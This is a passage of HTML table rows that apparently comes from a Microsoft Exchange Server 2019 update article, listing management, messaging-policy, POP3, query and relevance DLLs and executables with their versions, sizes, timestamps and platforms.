td><td>x86</td></tr><tr><td>Microsoft.exchange.management.activedirectory.dll</td><td>15.2.464.10</td><td>415,096</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.classificationdefinitions.dll</td><td>15.2.464.10</td><td>1,269,840</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.compliancepolicy.dll</td><td>15.2.464.10</td><td>39,296</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.controlpanel.basics.dll</td><td>15.2.464.10</td><td>433,232</td><td>01-Jan-2020</td><td>10:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.controlpanel.dll</td><td>15.2.464.11</td><td>4,563,328</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.controlpanel.owaoptionstrings.dll</td><td>15.2.464.10</td><td>260,992</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.controlpanelmsg.dll</td><td>15.2.464.10</td><td>33,664</td><td>01-Jan-2020</td><td>10:48</td><td>x64</td></tr><tr><td>Microsoft.exchange.management.deployment.analysis.dll</td><td>15.2.464.10</td><td>94,312</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.deployment.dll</td><td>15.2.464.10</td><td>586,104</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.deployment.xml.dll</td><td>15.2.464.10</td><td>3,537,512</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.detailstemplates.dll</td><td>15.2.464.11</td><td>68,176</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.dll</td><td>15.2.464.11</td><td>16,483,704</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.edge.systemmanager.dll</td><td>15.2.464.11</td><td>58,752</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.infrastructure.asynchronoustask.dll</td><td>15.2.464.11</td><td>23,936</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.jitprovisioning.dll</td><td>15.2.464.10</td><td>101,752</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.migration.dll</td><td>15.2.464.11</td><td>543,616</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.mobility.dll</td><td>15.2.464.11</td><td>305,248</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.nativeresources.dll</td><td>15.2.464.10</td><td>273,784</td><td>01-Jan-2020</td><td>10:50</td><td>x64</td></tr><tr><td>Microsoft.exchange.management.powershell.support.dll</td><td>15.2.464.11</td><td>418,896</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.provisioning.dll</td><td>15.2.464.11</td><td>275,840</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.psdirectinvoke.dll</td><td>15.2.464.11</td><td>70,520</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.rbacdefinition.dll</td><td>15.2.464.10</td><td>7,873,096</td><td>01-Jan-2020</td><td>10:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.recipient.dll</td><td>15.2.464.11</td><td>1,501,560</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.snapin.esm.dll</td><td>15.2.464.11</td><td>71,552</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.systemmanager.dll</td><td>15.2.464.11</td><td>1,238,904</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.transport.dll</td><td>15.2.464.11</td><td>1,877,064</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.managementgui.dll</td><td>15.2.464.10</td><td>5,366,864</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.managementmsg.dll</td><td>15.2.464.10</td><td>36,216</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Microsoft.exchange.mapihttpclient.dll</td><td>15.2.464.10</td><td>117,624</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.mapihttphandler.dll</td><td>15.2.464.11</td><td>207,736</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagesecurity.dll</td><td>15.2.464.10</td><td>79,736</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagesecurity.messagesecuritymsg.dll</td><td>15.2.464.10</td><td>17,488</td><td>01-Jan-2020</td><td>10:50</td><td>x64</td></tr><tr><td>Microsoft.exchange.messagingpolicies.dlppolicyagent.dll</td><td>15.2.464.10</td><td>156,264</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.edgeagents.dll</td><td>15.2.464.10</td><td>65,920</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.eventlog.dll</td><td>15.2.464.10</td><td>30,584</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Microsoft.exchange.messagingpolicies.filtering.dll</td><td>15.2.464.10</td><td>58,232</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.hygienerules.dll</td><td>15.2.464.10</td><td>29,568</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.journalagent.dll</td><td>15.2.464.10</td><td>175,696</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.redirectionagent.dll</td><td>15.2.464.10</td><td>28,544</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.retentionpolicyagent.dll</td><td>15.2.464.10</td><td>75,128</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.rmsvcagent.dll</td><td>15.2.464.10</td><td>207,224</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.rules.dll</td><td>15.2.464.10</td><td>440,192</td><td>01-Jan-2020</td><td>10:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.supervisoryreviewagent.dll</td><td>15.2.464.10</td><td>83,320</td><td>01-Jan-2020</td><td>10:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.transportruleagent.dll</td><td>15.2.464.10</td><td>35,200</td><td>01-Jan-2020</td><td>10:52</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.unifiedpolicycommon.dll</td><td>15.2.464.10</td><td>53,120</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.unjournalagent.dll</td><td>15.2.464.10</td><td>96,640</td><td>01-Jan-2020</td><td>10:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.migration.dll</td><td>15.2.464.10</td><td>1,109,880</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.migrationworkflowservice.eventlog.dll</td><td>15.2.464.10</td><td>14,712</td><td>01-Jan-2020</td><td>10:50</td><td>x64</td></tr><tr><td>Microsoft.exchange.mobiledriver.dll</td><td>15.2.464.10</td><td>135,544</td><td>01-Jan-2020</td><td>10:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.monitoring.activemonitoring.local.components.dll</td><td>15.2.464.11</td><td>5,065,592</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.monitoring.servicecontextprovider.dll</td><td>15.2.464.10</td><td>19,832</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.mrsmlbconfiguration.dll</td><td>15.2.464.10</td><td>68,472</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.net.dll</td><td>15.2.464.10</td><td>5,086,072</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.net.rightsmanagement.dll</td><td>15.2.464.10</td><td>265,592</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.networksettings.dll</td><td>15.2.464.10</td><td>37,968</td><td>01-Jan-2020</td><td>10:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.notifications.broker.eventlog.dll</td><td>15.2.464.10</td><td>14,208</td><td>01-Jan-2020</td><td>10:49</td><td>x64</td></tr><tr><td>Microsoft.exchange.notifications.broker.exe</td><td>15.2.464.11</td><td>549,752</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.oabauthmodule.dll</td><td>15.2.464.10</td><td>22,912</td><td>01-Jan-2020</td><td>10:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.oabrequesthandler.dll</td><td>15.2.464.10</td><td>106,368</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.oauth.core.dll</td><td>15.2.464.10</td><td>291,712</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.objectstoreclient.dll</td><td>15.2.464.10</td><td>17,272</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.odata.configuration.dll</td><td>15.2.464.10</td><td>277,888</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.odata.dll</td><td>15.2.464.11</td><td>2,993,744</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.common.dll</td><td>15.2.464.10</td><td>90,696</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.grain.dll</td><td>15.2.464.10</td><td>101,752</td><td>01-Jan-2020</td><td>10:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.graincow.dll</td><td>15.2.464.10</td><td>38,272</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.graineventbasedassistants.dll</td><td>15.2.464.10</td><td>45,432</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.grainpropagationengine.dll</td><td>15.2.464.10</td><td>58,448</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.graintransactionstorage.dll</td><td>15.2.464.10</td><td>147,328</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.graintransportdeliveryagent.dll</td><td>15.2.464.10</td><td>26,488</td><td>01-Jan-2020</td><td>10:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.graphstore.dll</td><td>15.2.464.10</td><td>184,400</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.permailboxkeys.dll</td><td>15.2.464.10</td><td>26,696</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.secondarycopyquotamanagement.dll</td><td>15.2.464.10</td><td>38,272</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.secondaryshallowcopylocation.dll</td><td>15.2.464.10</td><td>55,888</td><td>01-Jan-2020</td><td>10:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.security.dll</td><td>15.2.464.10</td><td>147,320</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.semanticgraph.dll</td><td>15.2.464.10</td><td>191,872</td><td>01-Jan-2020</td><td>10:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.tasklogger.dll</td><td>15.2.464.10</td><td>33,664</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.partitioncache.dll</td><td>15.2.464.10</td><td>28,024</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.passivemonitoringsettings.dll</td><td>15.2.464.10</td><td>32,840</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.photogarbagecollectionservicelet.dll</td><td>15.2.464.10</td><td>15,224</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.pop3.eventlog.dll</td><td>15.2.464.10</td><td>17,488</td><td>01-Jan-2020</td><td>10:49</td><td>x64</td></tr><tr><td>Microsoft.exchange.pop3.eventlog.dll.fe</td><td>15.2.464.10</td><td>17,488</td><td>01-Jan-2020</td><td>10:49</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.pop3.exe</td><td>15.2.464.10</td><td>106,880</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.pop3.exe.fe</td><td>15.2.464.10</td><td>106,880</td><td>01-Jan-2020</td><td>10:49</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.pop3service.exe</td><td>15.2.464.10</td><td>25,168</td><td>01-Jan-2020</td><td>10:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.pop3service.exe.fe</td><td>15.2.464.10</td><td>25,168</td><td>01-Jan-2020</td><td>10:50</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.popconfiguration.dl1</td><td>15.2.464.10</td><td>43,080</td><td>01-Jan-2020</td><td>10:50</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.popimap.core.dll</td><td>15.2.464.10</td><td>264,776</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.popimap.core.dll.fe</td><td>15.2.464.10</td><td>264,776</td><td>01-Jan-2020</td><td>10:49</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.powersharp.dll</td><td>15.2.464.10</td><td>358,272</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.powersharp.management.dll</td><td>15.2.464.11</td><td>4,165,216</td><td>01-Jan-2020</td><td>10:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.powershell.configuration.dll</td><td>15.2.464.11</td><td>308,600</td><td>01-Jan-2020</td><td>10:49</td><td>x64</td></tr><tr><td>Microsoft.exchange.powershell.rbachostingtools.dll</td><td>15.2.464.11</td><td>41,552</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.protectedservicehost.exe</td><td>15.2.464.10</td><td>30,584</td><td>01-Jan-2020</td><td>10:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.protocols.fasttransfer.dll</td><td>15.2.464.10</td><td>137,088</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.protocols.mapi.dll</td><td>15.2.464.10</td><td>441,720</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.provisioning.eventlog.dll</td><td>15.2.464.10</td><td>14,408</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Microsoft.exchange.provisioningagent.dll</td><td>15.2.464.11</td><td>224,632</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.provisioningservicelet.dll</td><td>15.2.464.11</td><td>105,848</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.pst.dll</td><td>15.2.464.11</td><td>169,040</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.pst.dll.deploy</td><td>15.2.464.11</td><td>169,040</td><td>01-Jan-2020</td><td>10:48</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.pswsclient.dll</td><td>15.2.464.10</td><td>259,448</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.publicfolders.dll</td><td>15.2.464.10</td><td>72,264</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.pushnotifications.crimsonevents.dll</td><td>15.2.464.10</td><td>215,928</td><td>01-Jan-2020</td><td>10:50</td><td>x64</td></tr><tr><td>Microsoft.exchange.pushnotifications.dll</td><td>15.2.464.10</td><td>106,880</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.pushnotifications.publishers.dll</td><td>15.2.464.10</td><td>425,856</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.pushnotifications.server.dll</td><td>15.2.464.10</td><td>70,520</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.query.analysis.dll</td><td>15.2.464.10</td><td>46,464</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.query.configuration.dll</td><td>15.2.464.10</td><td>216,136</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.query.core.dll</td><td>15.2.464.10</td><td>168,320</td><td>01-Jan-2020</td><td>10:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.query.ranking.dll</td><td>15.2.464.10</td><td>343,424</td><td>01-Jan-2020</td><td>10:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.query.retrieval.dll</td><td>15.2.464.10</td><td>174,464</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.query.suggestions.dll</td><td>15.2.464.10</td><td>95,104</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.realtimeanalyticspublisherservicelet.dll</td><td>15.2.464.10</td><td>127,360</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.relevance.core.dll</td><td>15.2.464.10</td><td>63,560</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.relevance.data.dll</td><td>15.2.464.10</td><td>36,968</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Microsoft.exchange.relevance.mailtagger.dll</td><td>15.2.464.10</td><td>17,792</td><td>01-Jan-2020</td><td>10:50</td><td>x64</td></tr><tr><td>Microsoft.exchange.relevance.people.dll</td><td>15.2.464.10</td><td>9,667,144</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.relevance.peopleindex.dll</td><td>15.2.464.10</td><td>20,788,096</td><td>01-Jan-2020</td><td>10:50</td><td>x64</td></tr><tr><td>Microsoft.exchange.relevance.peopleranker.dll</td><td>15.2.464.10</td><td>36,728</td><td>01-Jan-2020</td><td>10:51</td>